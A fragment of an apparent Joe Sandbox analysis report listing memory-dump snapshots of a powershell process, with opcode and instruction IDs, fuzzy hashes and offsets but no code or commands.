                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_7ffd9ba20000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cbdcfa53505e46d65171549a046905a33b1c1de61acd246c93cd5f99d3abee2d
                                      • Instruction ID: 26566ce5fc4d159cb422b85cb154bbd27be74aa923bf99321c35dfc91dc51004
                                      • Opcode Fuzzy Hash: cbdcfa53505e46d65171549a046905a33b1c1de61acd246c93cd5f99d3abee2d
                                      • Instruction Fuzzy Hash: 25413772A1CB8C4FEB289B5C9C1A6E87BE0FB95720F04427FE44993152CA616945CBC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1943636001.00007FFD9B90D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B90D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_7ffd9b90d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0524068f4aa3598898117d8bd1d470142ce4c4ccf969b2b4222cb9bab9440fb2
                                      • Instruction ID: c25ea70afe3ff01c1c6aea4df263db0ddb380bd71a6c52531e1559151670670a
                                      • Opcode Fuzzy Hash: 0524068f4aa3598898117d8bd1d470142ce4c4ccf969b2b4222cb9bab9440fb2
                                      • Instruction Fuzzy Hash: B841187181EFC45FE7568B2898519623FF0EF52220B1605DFD0C8CB1A3D625A845C7A2
                                      Uniqueness

Strings